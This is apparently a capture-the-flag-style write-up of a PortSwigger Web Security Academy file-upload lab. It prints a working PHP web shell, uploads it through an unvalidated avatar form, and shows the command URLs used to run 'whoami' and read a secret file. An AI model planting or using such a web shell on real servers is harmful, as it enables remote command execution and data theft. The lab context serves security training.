| Field | Detail |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | File Upload Vulnerabilities |
| Difficulty | Apprentice |
| Objective | Upload a PHP web shell to the server and use it to read /home/carlos/secret |
Remote Code Execution via Web Shell Upload¶
I logged in as wiener:peter and found an avatar upload function on the account page with no content-type restrictions, no extension filtering, and no mention of allowed file types.
I uploaded a minimal PHP command shell as tetoshell.php:
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
The file avatars/tetoshell.php has been uploaded.
No validation — the file landed at /files/avatars/tetoshell.php in a web-accessible directory served by the PHP interpreter. The upload path matters as much as the upload itself: a non-web-accessible directory, or a server that doesn't pass .php files to the interpreter, would break the attack.
Confirming RCE:
/files/avatars/tetoshell.php?cmd=whoami
Returns carlos. Reading the secret:
/files/avatars/tetoshell.php?cmd=cat%20/home/carlos/secret
File contents returned directly in the response. Submitting the secret:
And lab solved